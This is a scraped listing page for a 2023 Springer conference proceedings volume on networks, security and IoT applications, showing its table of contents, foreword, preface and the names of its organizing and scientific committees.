International Conference on Advanced Intelligent Systems for Sustainable Development: Volume 2 - Advanced Intelligent Systems on Network, Security, ... (Lecture Notes in Networks and Systems) 3031352505, 9783031352508

This book describes the potential contributions of emerging technologies in different fields as well as the opportunitie

154 50 55MB

English Pages 460 [454] Year 2023

Report DMCA / Copyright

DOWNLOAD PDF FILE

Table of contents :
Foreword
Preface
Organization
Acknowledgement
Contents
Two Levels Feature Selection Approach for Intrusion Detection System
1 Introduction
2 Related Work
3 Background on Feature Selection
4 Proposed Approach
5 Experimental Setup
6 Results and Comparative Analysis
6.1 Results and Discussion
6.2 Comparative Analysis
7 Conclusions and Future Work
References
Method of Detecting Denial of Service Attacks in WSNs While Optimizing Network Life Span
1 Introduction
2 Related Works
2.1 Protocol LEACH-EDE
2.2 Denial of Service Attack
3 Approach
3.1 Problematic
3.2 Proposed System (LTMN Protocol)
4 Conclusion
References
Numerical Investigation into the Vertical Dynamic Behavior of Railway Tracks
1 Introduction
2 Numerical Study on the Railway Tracks Dynamic Response
3 Validation of the Calculation Results
4 The Dynamic Properties of the Non-ballasted Railway Track
5 Conclusion
References
A Lightweight, Multi-layered Internet Filtering System
1 Introduction
2 Internet Filtering Methods
3 Problematic
4 Project Presentation
4.1 Filtering Equipment
4.2 Servers on the Cloud
4.3 The Mobile Control Application
5 The Filtering Process
5.1 The Web Filtering Module
5.2 The Service Filtering Module
5.3 The Filtering Module of an Application
6 The Deployment of the Solution
7 Conclusion
Tracking Methods: Comprehensive Vision and Multiple Approaches
1 Introduction
2 Elucidation Tracking
3 Related Work
4 Analysis and Discussion
5 Conclusion and Future Work
References
Multi-blockchain Scheme Based on IoT and Smart Contracts in the Agricultural Field for Data Management
1 Introduction
2 Previous Work
3 The Proposed Architecture
4 Conclusion
References
A Geometry-Based Analytical Model for Vehicular Visible Light Communication Channels
1 Introduction
1.1 Related Works
2 System Model
2.1 Atmospheric Attenuation ha
2.2 The Geometrical Propagation Path Loss hg
3 Simulation Results and Analysis
4 Conclusion
References
Mapping Review of Research on Supply Chains Relocation
1 Introduction
2 Different Business Strategies Related To SCM
3 Definition of Relocation in Literature
3.1 Existing Definitions of Relocation
3.2 Types of Relocation
4 Motivations Behind Relocation Across Literature
5 Literature Review: Dimensions of the Relocation Decision Model and Its Different Variables
5.1 Mapping Review of Supply Chains Relocation
5.2 Mapping Strategy
5.3 Yearly Contribution Trend and Main Authors
5.4 Subject Area and Fileds of Research
5.5 Geographical Position and Contributing Affiliations
6 Financial Factors in SCRM
7 Conclusion
References
A Predictive Maintenance System Based on Vibration Analysis for Rotating Machinery Using Wireless Sensor Network (WSN)
1 Introduction
2 Predictive Maintenance for Rotating Machinery
2.1 Concept and Functioning of the Predictive Maintenance (PdM)
2.2 Predictive Maintenance Technologies
2.3 Predictive Maintenance - Process (CBM-PHM)
3 Detection, Diagnosis, and Prognosis for Rotating Machinery
3.1 Detecting Faults of Rotating Machines
3.2 Commonly Witnessed Machinery Faults Diagnosed by Vibration Analysis
3.3 Vibration Signal Analysis and Measurement
3.4 The Accelerometer Sensor
3.5 Classification of Diagnostic Methods
4 Wireless Sensor Network (WSN)
5 Results and Discussions
6 Conclusion and Perspectives
References
A Comparative Study of Vulnerabilities Scanners for Web Applications: Nexpose vs Acunetix
1 Introduction
2 Description of XSS, SQL Injection (Second Order) and CSRF
2.1 Cross Site Scripting (XSS)
2.2 SQL Injection (Second-Order)
2.3 CSRF (Giant-Cross Site Request Forgery)
3 Penetration Testing Concept
3.1 Acunetix
3.2 Nexpose
4 Application and Comparison
4.1 Proposed Architecture
4.2 Benchmarking
5 Conclusion
References
The Pulse-Shaping Filter Influence over the GFDM-Based System
1 Introduction
2 System Model-Based OFDM
3 System Model-Based GFDM
3.1 GFDM Transmitter
3.2 GFDM Receiver
3.3 Rectangular Filter
3.4 Raised-Cosinise (RC)
3.5 Root Raised-Cosinise (RRC)
4 Numerical Results
4.1 The Impact of the the Designed Pulse-Shaping Filter
4.2 Influence of the Number of Sub-carriers
5 Conclusion
References
Intrusion Detection Systems in Internet of Things Using Machine Learning Algorithms: A Comparative Study
1 Introduction
2 Relevant Terms
2.1 Intrusion Detection System
2.2 Internet of Things
2.3 Machine Learning
3 Preliminary
3.1 The Algorithms Used
3.2 The Parameters Used
3.3 The Dataset Used
4 Experiment
4.1 Experiment Setup
4.2 Results and Discussion
5 Conclusion
References
Generative Adversarial Networks for IoT Devices and Mobile Applications Security
1 Introduction
2 Mobile Applications' Vulnerabilities
3 Solutions for Protecting Mobile Applications
3.1 Hardware Level Protections
3.2 Generative Adversarial Networks for Software Level Protection
4 Conclusion and Perspectives
References
The Indoor Localization System Based on Federated Learning and RSS Using UWB-OFDM
1 Introduction
2 Indoor Localization Based on Federated Learning FL and RSS Method
3 Evaluation of Results
3.1 System Parameters
3.2 Simulation Setup
3.3 Discussion
4 Tools Performance
5 Conclusion
References
Artificial Intelligence for Smart Decision-Making in the Cities of the Future
1 Introduction
2 Proposed Methodology
2.1 Formal Concept Analysis
2.2 Concept Lattices
2.3 Data Extraction Environment
3 Results and Discussion
4 Conclusion and Perspectives
References
Performance Comparison of Localization Techniques in Term of Accuracy in Wireless Sensor Networks
1 Introduction
2 Wireless Sensor Network (WSN)
3 Localization Algorithm
3.1 Range-Based Technique
3.2 Range-Free Technique
4 Simulation and Results
4.1 Placement Model
4.2 System Parameters
4.3 Results
5 Conclusion and Future Works
References
Fog Computing Model Based on Queuing Theory
1 Introduction
2 Vehicular Fog Computing Architecture
3 Model Description
4 Problem Analytical Model
4.1 The Mobile and Static Fog Nodes Models
4.2 QoS Performance Parameters
5 Numerical Results
6 Discussion
7 Conclusion
References
From Firewall and Proxy to IBM QRadar SIEM
1 Introduction
2 SIEM IBM QRADAR
References
IoT-Based Approach for Wildfire Monitoring and Detection
1 Introduction
2 Background
2.1 Internet of Things
2.2 Sensors
2.3 LoRaWAN
2.4 ESP32
2.5 MQTT
3 Related Work
4 Proposed Methodology
4.1 Proposed Prototype
5 Results and Discussions
6 Conclusion
References
A Decision-Making Model Based on a High-Level Ontology in Context of a Smart Home
1 Introduction
2 Ontology Context and Smart Home
3 Related Work
4 Proposed Model
5 Conclusion
References
Integration of the Human Factor in the Management and Improvement of Performance of Production Systems: An Exploratory Literature Review
1 Introduction
2 Industry 4.0: Overview from History
2.1 Web and Mobile Applications
2.2 3D Printing
2.3 Internet of Things (IoT)
2.4 Cloud Computing
3 Human Factors
4 Literature Review
5 Challenges of Human Factor
6 Challenges of New Technologies
7 Analysis and Discussions
8 Conclusions
References
Securing Caesar Cryptography Using the 2D Geometry
1 Introduction
2 Related Work
3 Proposed Method
3.1 Explanation of the Method
3.2 Encryption Process
3.3 Decryption Process
4 Resistance Against Attacks
4.1 Brute Force Attack
4.2 Frequency Analysis Attack
5 Experimentation
5.1 Encrypting the Original Text
5.2 Securing the Text with the Proposed Algorithm
5.3 Decryption of the Received Text
6 Conclusion
References
A Comparative Study of Neural Networks Algorithms in Cyber-Security to Detect Domain Generation Algorithms Based on Mixed Classes of Data
1 Introduction
2 Domain Generation Algorithms
2.1 DGA Structures and Types
2.2 DGAs Features
3 Neural Network Methods to Detect DGAs
3.1 Data Collection
3.2 Architectures of the Compared Models
4 Evaluation
4.1 Implementation Details
4.2 Resultat
5 Conclusion and Feature Works
References
A Literature Review of Digital Technologies in Supply Chains
1 Introduction
2 Literature Review and Background
2.1 Digital Technologies of the Supply Chain
3 Methodological Procedures
4 Results and Discussions
5 Conclusion
References
IoT Systems Security Based on Deep Learning: An Overview
1 Introduction
2 IoT Security Threats Per Layer
3 History of IoT Security Attacks
4 Deep Learning and IoT Security
5 Conclusion
References
Deep Learning for Intrusion Detection in WoT
1 Introduction
2 Related Work
3 Proposed Work
4 Conclusion
References
Artificial Intelligence Applications in the Global Supply Chain: Benefits and Challenges
1 Introduction
2 Understanding of Artificial Intelligence Technology
2.1 Definition and History
2.2 Enabling Drivers and Technologies of Artificial Intelligence
3 Benefits of Artificial Intelligence in Supply Chain Management:
3.1 Artificial Intelligence and Forecast Demand Optimization
3.2 Artificial Intelligence Between Manufacturing and Smart Manufacturing
3.3 Artificial Intelligence and Warehousing
3.4 Artificial Intelligence and Distribution
4 Artificial Intelligence Risks and Challenges
5 Conclusion
References
Fault Detection and Diagnosis in Condition-Based Predictive Maintenance
1 Introduction
2 Terminology and Concepts
2.1 Fault, Failure, and Malfunction
2.2 Predictive Maintenance and Condition Monitoring
2.3 Fault Detection, Diagnosis, and Prognosis
3 Machine Fault Diagnosis
3.1 Model-Based Approach
4 Conclusion and Future Research
References
Agile Practices in Iteration Planning Process of Global Software Development
1 Introduction
2 Background and Related Work
2.1 Challenges of Global Software Development Projects
2.2 Iteration Planning in Software Development Project
3 Iteration Planning in GSD: Activities and Repositories
3.1 Iteration Planning in GSD Project: Activities
3.2 Iteration Planning Repositories
4 Conclusion
References
Sensitive Infrastructure Control Systems Cyber-Security: Literature Review
1 Introduction
2 An Over View About Cyber-Security
2.1 Cyber-Security
2.2 Cyber-Attacks
2.3 Cyber-Defense
2.4 Impact of Cyber-Attacks
2.5 Consequences of Cyber-Attacks
3 Critical Infrastructures:
4 Research Perspectives
4.1 Social Dimension
4.2 Political Dimension
4.3 Technical Dimension
5 Conclusion
References
Design of SCMA Codebook Based on QAM Segmentation Constellation
1 Introduction
2 System Model
3 Sparse Mapping Matrix F with PEG
4 SCMA Codebook Design
4.1 Mother Constellation - MC
4.2 Sub-constellation Generation with MED Maximization
4.3 SCMA Codebook Generation by Sub-constellation Mapping with MED Maximization
5 Design Example
6 Numerical Results and Analysis
7 Conclusion
References
Towards an Optimization Model for Outlier Detection in IoT-Enabled Smart Cities
1 Introduction
2 Related Work
2.1 IoT Paradigm: Definition, Layers and Enabling Technologies
2.2 Data Quality: Definition, Dimensions and Issues
2.3 Outlier Detection: Definition and Techniques
3 Towards a model for outlier detection in IoT-enabled smart cities
3.1 Data Quality for Geolocation Services
3.2 Recommended Method for OD
4 Conclusion
References
Performance Analysis of Static and Dynamic Clustering Protocols for Wireless Sensor Network
1 Introduction
2 Energy Consumption Model
3 Energy Consumed in Dynamic Clustering (set-Up Phase)
4 Energy Consumed in Static Clustering
5 Experiments and Results
5.1 Comparison of Network Lifetime
5.2 Comparison of the Energy Consumption.
5.3 Comparison of the Data Received by the Base Station
6 Conclusion
References
A Comprehensive Study of Integrating AI-Based Security Techniques on the Internet of Things
1 Introduction
2 Related Works
3 Overview of the Internet of Things (IoT) and Security Threats
3.1 IoT Overview
3.2 Challenges of the Emerging IoT Networks
3.3 Security Threats in IoT Networks
4 AI-Based Methods for IoT Security
5 Open Challenges and Future Research Opportunities
6 Conclusion
References
Semantic Segmentation Architecture for Text Detection with an Attention Module
1 Introduction
2 Related Works
3 The Proposed Method
3.1 Architecture
3.2 Attention Block
3.3 Loss
4 Experiments
5 Results
5.1 Quantitative Results
5.2 Qualitative Results
6 Conclusion
References
Car Damage Detection Based on Mask Scoring RCNN
1 Introduction
2 Related Work
3 Proposed Method
3.1 Mask Scoring RCNN
3.2 Transfer Learning
4 Results and Discussion
4.1 Dataset
4.2 Training Platform
4.3 Evaluation Metric
4.4 Results
4.5 Comparison with Mask RCNN
5 Conclusion
References
Blockchain and IoT for Real-Time Decision Support for the Optimization of Maritime Freight Transport Networks
1 Introduction
1.1 Big Data, Blockchain and Internet of Things as Solution for Logistics and Freight Transportation Problems
1.2 Overview of the Concept of Big Data
2 Big Data and IoT Technologies in Maritime Freight Transportation
2.1 Smart Containers
3 Adoption of Blockchain in Maritime Freight Transportation
3.1 What is Blockchain?
3.2 Problematic Solved by Blockchain Technology
4 What is Blockchain’s Value Proposition in Maritime Freight Transportation?
4.1 Smart Contracts
5 A Model for Using Blockchain Transaction Process
6 Maritime Freight Transportation
7 Conclusion
References
MQTT Protocol Analysis According to QoS Levels and SSL Implementation for IoT Systems
1 Introduction
2 Related Work
3 Background
3.1 MQTT
3.2 Quality of Service (QoS)
4 Experimental Study and Results
4.1 MQTT Analysis Without Security
4.2 MQTT Analysis with Security Implemented
5 Results and Discussion
6 Conclusion
References
New Analytical Method to Classify Areas According to Signal Quality and Coverage of GSM Network
1 Introduction
2 Related Work
2.1 Evaluation of the Signal Strength of the Mobile Network for GSM Networks in Gusau, in the State of Zamfara
2.2 Comparison Between the Differ Operator
3 Collection of Data via the Application
3.1 Figures and Tables Development of a Mobile Application
3.2 The Areas Concerned
4 The Algorithm Proposes
4.1 The Flood Filling Algorithm
4.2 Program Code
5 Proposed Solution
5.1 Presented Nodes via Signal Strength Level on Relevant Areas
5.2 Presents Problem Areas via the Flood Algorithm
5.3 Model Architecture
6 Analysis of the Following Signal the Environment of Each Zone
7 Conclusion
References
Neural Network Feature-Based System for Real-Time Road Condition Prediction
1 Introduction
2 Related Works
3 Proposed Solution
4 Conclusion
References
Author Index
Recommend Papers

International Conference on Advanced Intelligent Systems for Sustainable Development: Volume 2 - Advanced Intelligent Systems on Network, Security, ... (Lecture Notes in Networks and Systems)
 3031352505, 9783031352508

  • 0 0 0
  • Like this paper and download? You can publish your own PDF file online for free in a few minutes! Sign Up
File loading please wait...
Citation preview

Lecture Notes in Networks and Systems 712

Janusz Kacprzyk Mostafa Ezziyyani Valentina Emilia Balas   Editors

International Conference on Advanced Intelligent Systems for Sustainable Development Volume 2 - Advanced Intelligent Systems on Network, Security, and IoT Applications

Lecture Notes in Networks and Systems

712

Series Editor Janusz Kacprzyk, Systems Research Institute, Polish Academy of Sciences, Warsaw, Poland

Advisory Editors Fernando Gomide, Department of Computer Engineering and Automation—DCA, School of Electrical and Computer Engineering—FEEC, University of Campinas—UNICAMP, São Paulo, Brazil Okyay Kaynak, Department of Electrical and Electronic Engineering, Bogazici University, Istanbul, Türkiye Derong Liu, Department of Electrical and Computer Engineering, University of Illinois at Chicago, Chicago, USA Institute of Automation, Chinese Academy of Sciences, Beijing, China Witold Pedrycz, Department of Electrical and Computer Engineering, University of Alberta, Alberta, Canada Systems Research Institute, Polish Academy of Sciences, Warsaw, Poland Marios M. Polycarpou, Department of Electrical and Computer Engineering, KIOS Research Center for Intelligent Systems and Networks, University of Cyprus, Nicosia, Cyprus Imre J. Rudas, Óbuda University, Budapest, Hungary Jun Wang, Department of Computer Science, City University of Hong Kong, Kowloon, Hong Kong

The series “Lecture Notes in Networks and Systems” publishes the latest developments in Networks and Systems—quickly, informally and with high quality. Original research reported in proceedings and post-proceedings represents the core of LNNS. Volumes published in LNNS embrace all aspects and subfields of, as well as new challenges in, Networks and Systems. The series contains proceedings and edited volumes in systems and networks, spanning the areas of Cyber-Physical Systems, Autonomous Systems, Sensor Networks, Control Systems, Energy Systems, Automotive Systems, Biological Systems, Vehicular Networking and Connected Vehicles, Aerospace Systems, Automation, Manufacturing, Smart Grids, Nonlinear Systems, Power Systems, Robotics, Social Systems, Economic Systems and other. Of particular value to both the contributors and the readership are the short publication timeframe and the world-wide distribution and exposure which enable both a wide and rapid dissemination of research output. The series covers the theory, applications, and perspectives on the state of the art and future developments relevant to systems and networks, decision making, control, complex processes and related areas, as embedded in the fields of interdisciplinary and applied sciences, engineering, computer science, physics, economics, social, and life sciences, as well as the paradigms and methodologies behind them. Indexed by SCOPUS, INSPEC, WTI Frankfurt eG, zbMATH, SCImago. All books published in the series are submitted for consideration in Web of Science. For proposals from Asia please contact Aninda Bose ([email protected]).

Janusz Kacprzyk · Mostafa Ezziyyani · Valentina Emilia Balas Editors

International Conference on Advanced Intelligent Systems for Sustainable Development Volume 2 - Advanced Intelligent Systems on Network, Security, and IoT Applications

Editors Janusz Kacprzyk Polish Academy of Sciences Systems Research Institute Warsaw, Poland

Mostafa Ezziyyani Abdelmalek Essaâdi University Tangier, Morocco

Valentina Emilia Balas Department of Automatics and Applied Software Aurel Vlaicu University of Arad Arad, Romania

ISSN 2367-3370 ISSN 2367-3389 (electronic) Lecture Notes in Networks and Systems ISBN 978-3-031-35250-8 ISBN 978-3-031-35251-5 (eBook) https://doi.org/10.1007/978-3-031-35251-5 © The Editor(s) (if applicable) and The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 This work is subject to copyright. All rights are solely and exclusively licensed by the Publisher, whether the whole or part of the material is concerned, specifically the rights of translation, reprinting, reuse of illustrations, recitation, broadcasting, reproduction on microfilms or in any other physical way, and transmission or information storage and retrieval, electronic adaptation, computer software, or by similar or dissimilar methodology now known or hereafter developed. The use of general descriptive names, registered names, trademarks, service marks, etc. in this publication does not imply, even in the absence of a specific statement, that such names are exempt from the relevant protective laws and regulations and therefore free for general use. The publisher, the authors, and the editors are safe to assume that the advice and information in this book are believed to be true and accurate at the date of publication. Neither the publisher nor the authors or the editors give a warranty, expressed or implied, with respect to the material contained herein or for any errors or omissions that may have been made. The publisher remains neutral with regard to jurisdictional claims in published maps and institutional affiliations. This Springer imprint is published by the registered company Springer Nature Switzerland AG The registered company address is: Gewerbestrasse 11, 6330 Cham, Switzerland

Foreword

Within the framework of the International Initiative for Sustainable Development of innovations and scientific research in order to keep pace with the digital transformation in light of the fourth industrial revolution and to encourage development projects known to the world, ENSAM-Rabat of Mohammed V University in cooperation with ICESCO organized the fourth edition of the International Conference on Advanced Smart Systems for Sustainable Development and their applications in various fields through five specialized seminars during the period from May 22 to 28, 2022. The fourth edition of the International Conference on Advanced Smart Systems for Sustainable Development was a great success, under the high patronage of His Majesty King of Morocco, Mohammed VI, and the participation of scientists and experts from more than 36 countries around the world. The conference, in its fourth edition, also resulted in a set of agreements and partnerships that were signed between the various participating parties, thus contributing to achieving the goals set by the conference regarding the investment of smart systems for sustainable development in the sectors of education, health, environment, agriculture, industry, energy, economy and security. In view of the importance of the conference as a high-level annual forum, and in consideration of the scientific status that the conference enjoys nationally, continually and internationally. Based on the experience gained and accumulated through the previous editions, we look forward to the success of next edition at all organizational and scientific levels, like its predecessors, and hosting a distinguished presence and weighty personalities from all participating countries in order to move forward for cooperation in priority areas and common interest such as health, agriculture, energy and industry.

Preface

Science, technology and innovation have for a long time been recognized as one of the main drivers behind productivity increases and a key long-term lever for economic growth and prosperity. In the context of the International Conference on Advanced Intelligent Systems for Sustainable Development plays an even more central role. Actually, AI2SD features strongly in Sustainable Development Goal in different fields, as well as being a cross-cutting one to achieve several sectoral goals and targets: Agriculture, Energy, Health, Environment, Industry, Education, Economy and Security. An ambition of the AI2SD to become the global forerunner of sustainable development should, in particular, include integrating new technologies and artificial intelligence and smart systems in its overarching and sectoral strategies of research and development. In which it emphasizes that solutions discussed by experts are important drivers for researches and development. AI2SD is an interdisciplinary international conference that invites academics, independent scholars and researchers from around the world to meet and exchange the latest ideas and discuss technological issues concerning all fields Social Sciences and Humanities for Sustainable Development. Due to the nature of the conference with its focus on innovative ideas and developments, AI2SD provides the ideal opportunity to bring together professors, researchers and high education students of different disciplines, to discuss new issues, and discover the most recent developments, scientific researches proposing the panel discussion on Advanced Technologies and Intelligent Systems for Sustainable Development Applied to Education, Agriculture, Energy, Health, Environment, Industry, Economy and Security.

Organization

Chairs General Chairs Mostafa Ezziyyani Janusz Kacprzyk Valentina Emilia Balas

Abdelmalek Essaadi University, FST – Tangier, Morocco Polish Academy of Sciences, Poland Aurel Vlaicu University of Arad, Romania

Co-chairs Khalid El Bikri Wajih Rhalem Loubna Cherrat Omar Halli

ENSAM Rabat, Morocco ENSAM Rabat, Morocco ENCG of Tangier, Morocco Advisor to the Director General of ICESCO

Honorary Presidents Salim M. Almalik

Abdellatif Miraoui Younes Sekkouri Ghita Mezzour

Director General (DG) of the Islamic World Educational, Scientific and Cultural Organization (ICESCO) Minister of Higher Education, Scientific Research and Professional Training of Morocco Minister of Economic Inclusion, Small Business, Employment and Skills Minister Delegate to the Head of Government in Charge of Digital Transition and Administration Reform

Honorary Guests Thomas Druyen

Jochen Werner

Director and Founder of the Institute for Future Psychology and Future Management, Sigmund Freud University Medical Director and CEO, Medicine University of Essen, Germany

x

Organization

Ibrahim Adam Ahmed El-Dukheri Director General of the Arab Organization for Agricultural Development Stéphane Monney Mouandjo Director General of CAFRAD Jamila El Alami Director of the CNRST Rabat, Morocco Mostapha Bousmina President of the EuroMed University of Fez, Fez, Morocco Chakib Nejjari President of the Mohammed VI University of Health Sciences Casablanca, Morocco Noureddine Mouaddib President of International University of Rabat, Rabat, Morocco Azzedine Elmidaoui President of Ibn Tofail University, Kenitra, Morocco Lahcen Belyamani President of the Moroccan Society of Emergency Medicine SAMU Rabat, Morocco Karim Amor President of Moroccan Entrepreneurs and High Potentials of the World-CGEM Hicham El Abbadi Business Sales Manager, Afrique Francophone EPSON Ilham Berrada Director of ENSIAS Rabat, Morocco Mostafa Stito Director of the ENSA of Abdelmalek Essaadi University, Tetouan, Morocco Mohamed Addou Dean of FST Tangier, Morocco Ahmed Maghni Director of ENCG Tangier, Morocco

Keynote Speakers Chakib Nejjari Anas Doukkali Thomas Druyen

Jochen Werner Abdelhamid Errachid El Salhi Oussama Barakat Fatima Zahra Alaoui Issame Outaleb Rachid Yazami

President of the Mohammed VI University of Health Sciences Casablanca, Morocco Former Minister of Health, Morocco Director and Founder of the Institute for Future Psychology and Future Management Sigmund Freud University Medical Director and CEO, Medicine University of Essen, Germany Full Professor Class Exceptional Class, University Claude Bernard, Lyon, France University of Franche-Comté, Besançon, France Dean of the Faculty of Medicine of Laâyoune, Morocco CEO and Founder PharmaTrace, Munich, Germany Scientist, Engineer and Inventor, Morocco

Organization

Tarkan Gürbüz Plamen Kiradjiev Abdel Labbi

Mostafa Ezziyyani Ghizlane Bouskri Levent Trabzon Marius M. Balas Afef Bohli

Ahmed Allam (President)

Valentina Emilia Balas Faissal Sehbaoui Jaime Lloret Hanan Melkaoui Issa Mouhamed Hossana Twinomurinzi Abdelhafid Debbarh Hatim Rhalem Faeiz Gargouri (Vice President) Adil Boushib Nasser Kettani

Kaoutar El Menzhi Khairiah Mohd-Yusof (President) Nadja Bauer Badr Ikken Amin Bennouna Mohamed Essaaidi Hamid Ouadia

xi

Middle East Technical University (METU), Ankara, Turkey German Edge Cloud (GEC), Friedhelm Loh Group, Germany Head of Data & AI Platforms Research, IBM Distinguished Engineer, IBM Research – Europe FST – Tangier, Morocco Senior Data Scientist at Volkswagen Group, Germany Mechanical Engineering, Istanbul Technical University, Turkey Aurel Vlaicu University of Arad Assistant Professor at the Higher Institute of Computer Science and the Cofounder of Digi Smart Solutions World Association for Sustainable Development, Senior Policy Fellow, Queen Mary University of London, UK Aurel Vlaicu University of Arad, Romania CEO of AgriEDGE, Attached to the Mohammed VI Polytechnic University Department of Communications Polytechnic University of Valencia, Spain Yarmouk University, Irbid, Jordan Head|Centre for Applied Data Science at University of Johannesburg, South Africa Chief of Staff/Advisor to the President-UIR EPSON Sales Manager, Morocco University of Sfax, Tunisia Regional Manager Microsoft, Germany Entrepreneur, ExO Coach, Digital Transformation Expert, Exponential Thinker, Certified DPO, Accessibility Expert Head of Digital Learning Center UM5R, Morocco Johor Bahru, Johor, Malaysia Dortmund, Germany General Director of IRESEN, Rabat, Morocco Cadi Ayyad University, Marrakech, Morocco ENSIAS, Mohammed V University, Rabat, Morocco ENSAM, Mohammed V University, Rabat, Morocco

xii

Organization

Khalid Zinedine Brahim Benaji Youssef Taher Tarik Chafik Abdoulkader Ibrahim Idriss Loubna Cherrat Laila Ben Allal Najib Al Idrissi

Hassan Ghazal Muhammad Sharif Mounir Lougmani El Hassan Abdelwahid Mohamed Zeriab Es-Sadek Mustapha Mahdaoui M’Hamed Ait Kbir Mohammed Ahachad

Faculty of Sciences, Mohammed V University, Rabat, Morocco ENSAM, Mohammed V University, Rabat, Morocco Center of Guidance and Planning of Education, Morocco FST, Abdelmalek Essaadi University, Tangier, Morocco Dean of Faculty of Engineering – University of Djibouti, Djibouti Abdelmalek Essaadi University, Morocco FST Abdelmalek Essaadi University, Morocco Mohammed VI University of Health Sciences, General Secretary of the Moroccan Society of Digital Health, Morocco President of the Moroccan Association of Telemedicine and E-Health, Morocco Director and Founder of Advisor/Science and Technology at ICESCO General Secretary of the Association of German Moroccan Friends-DMF Cadi Ayyad University, Marrakech ENSAM, Mohammed V University in Rabat FST, Abdelmalek Essaadi University, Morocco Abdelmalek Essaadi University, Morocco Abdelmalek Essaadi University, Morocco

Course Leaders Adil Boushib Ghizlane Bouskri Nadja Bauer Hassan Moussif Abdelmounaim Fares Imad Hamoumi Ghizlane Sbai

Regional Manager Microsoft, Germany Senior Data Scientist at Volkswagen Group, Germany Dortmund, Germany Deutsche Telekom expert, Germany. General Director and Founder of M-tech Co-Founder and Chief Executive Officer Guard Technology, Germany Senior Data Scientist Engineer, Germany Product Owner, Technical Solution Owner at Pro7Sat1

Organization

Scientific Committee Christian Axiak, Malta Bougdira Abdeslam, Morocco Samar Kassim, Egypt Vasso Koufi, Greece Alberto Lazzero, France Charafeddine Ait Zaouiat, Morocco Mohammed Merzouki, Morocco Pedro Mauri, Spain Sandra Sendra, Spain Lorena Parra, Spain Oscar Romero, Spain Kayhan Ghafoor, China Jaime Lloret Mauri, Spain Yue Gao, UK Faiez Gargouri, Tunis Mohamed Turki, Tunis Abdelkader Adla, Algeria Souad Taleb Zouggar, Algeria El-Hami Khalil, Morocco Bakhta Nachet, Algeria Danda B. Rawat, USA Tayeb Lemlouma, France Mohcine Bennani Mechita, Morocco Tayeb Sadiki, Morocco Mhamed El Merzguioui, Morocco Abdelwahed Al Hassan, Morocco Mohamed Azzouazi, Morocco Mohammed Boulmalf, Morocco Abdellah Azmani, Morocco Kamal Labbassi, Morocco Jamal El Kafi, Morocco Dahmouni Abdellatif, Morocco Meriyem Chergui, Morocco El Hassan Abdelwahed, Morocco Mohamed Chabbi, Morocco Mohamed_Riduan Abid, Morocco Jbilou Mohammed, Morocco Salima Bourougaa-Tria, Algeria Zakaria Bendaoud, Algeria Noureddine En-Nahnahi, Morocco Mohammed Bahaj, Morocco Feddoul Khoukhi, Morocco Ahlem Hamdache, Morocco

xiii

xiv

Organization

Mohammed Reda Britel, Morocco Houda El Ayadi, Morocco Youness Tabii, Morocco Mohamed El Brak, Morocco Abbou Ahmed, Morocco Elbacha Abdelhadi, Morocco Regragui Anissa, Morocco Samir Ahid, Morocco Anissa Regragui, Morocco Frederic Lievens, Belgium Emile Chimusa, South Africa Abdelbadeeh Salem, Egypt Mamadou Wele, Mali Cheikh Loukobar, Senegal Najeeb Al Shorbaji, Jordan Sergio Bella, Italy Siri Benayad, Morocco Mourad Tahajanan, Morocco Es-Sadek M. Zeriab, Morocco Wajih Rhalem, Morocco Nassim Kharmoum, Morocco Azrar Lahcen, Morocco Loubna Cherrat, Morocco Soumia El Hani, Morocco Essadki Ahmed, Morocco Hachem El Yousfi Alaoui, Morocco Jbari Atman, Morocco Ouadi Hamid, Morocco Tmiri Amal, Morocco Malika Zazi, Morocco Mohammed El Mahi, Morocco Jamal El Mhamdi, Morocco El Qadi Abderrahim, Morocco Bah Abdellah, Morocco Jalid Abdelilah, Morocco Feddi Mustapha, Morocco Lotfi Mostafa, Morocco Larbi Bellarbi, Morocco Mohamed Bennani, Morocco Ahlem Hamdache, Morocco Mohammed Haqiq, Morocco Abdeljabbar Cherkaoui, Morocco Rafik Bouaziz, Tunis Hanae El Kalkha, Morocco Hamid Harroud, Morocco

Organization

Joel Rodrigues, Portugal Ridda Laaouar, Algeria Mustapha El Jarroudi, Morocco Abdelouahid Lyhyaoui, Morocco Nasser Tamou, Morocco Bauer Nadja, Germany Peter Tonellato, USA Keith Crandall, USA Stacy Pirro, USA Tatiana Tatusova, USA Yooseph Shibu, USA Yunkap Kwankam, Switzerland Frank Lievens, Belgium Kazar Okba, Algeria Omar Akourri, Morocco Pascal Lorenz, France Puerto Molina, Spain Herminia Maria, Spain Driss Sarsri, Morocco Muhannad Quwaider, India Mohamed El Harzli, Morocco Wafae Baida, Morocco Mohammed Ezziyyani, Morocco Xindong Wu, China Sanae Khali Issa, Morocco Monir Azmani, Morocco El Metoui Mustapha, Morocco Mustapha Zbakh, Morocco Hajar Mousannif, Morocco Mohammad Essaaidi, Morocco Amal Maurady, Morocco Ben Allal Laila, Morocco Ouardouz Mustapha, Morocco Mustapha El Metoui Morocco Said Ouatik El Alaoui, Morocco Lamiche Chaabane, Algeria Hakim El Boustani, Morocco Azeddine Wahbi, Morocco Nfaoui El Habib, Morocco Aouni Abdessamad, Morocco Ammari Mohammed, Morocco El Afia Abdelatif, Morocco Noureddine En-Nahnahi, Morocco Zakaria Bendaoud, Algeria Boukour Mustapha, Morocco

xv

xvi

Organization

El Maimouni Anas, Morocco Ziani Ahmed, Morocco Karim El Aarim, Morocco Imane Allali, Morocco Mounia Abik, Morocco Barrijal Said, Morocco Mohammed V., Rabat, Morocco Franccesco Sicurello, Italy Bouchra Chaouni, Morocco Charoute Hicham, Morocco Zakaria Bendaoud, Algeria Ahachad Mohammed, Morocco Abdessadek Aaroud, Morocco Mohammed Said Riffi, Morocco Abderrahim Abenihssane, Morocco Abdelmajid El Moutaouakkil, Morocco Silkan, Morocco Khalid El Asnaoui, France Salwa Belaqziz, Morocco Khalid Zine-Dine, Morocco Ahlame Begdouri, Morocco Mohamed Ouzzif, Morocco Essaid Elbachari, Morocco Mahmoud Nassar, Morocco Khalid Amechnoue, Morocco Hassan Samadi, Morocco Mohammed Yahyaoui, Morocco Hassan Badir, Morocco Ezzine Abdelhak, Morocco Mohammed Ghailan, Morocco Kaoutar Elhari, Morocco Mohammed El M’rabet, Morocco El Khatir Haimoudi, Morocco Mounia Ajdour, Morocco Lazaar Saiida, Morocco Mehdaoui Mustapha, Morocco Zoubir El Felsoufi, Morocco Khalil El Hami, Morocco Yousef Farhaoui, Morocco Mohammed Ahmed Moammed Ail, Sudan Abdelaaziz El Hibaoui, Morocco Othma Chakkor, Morocco Abdelali Astito, Morocco 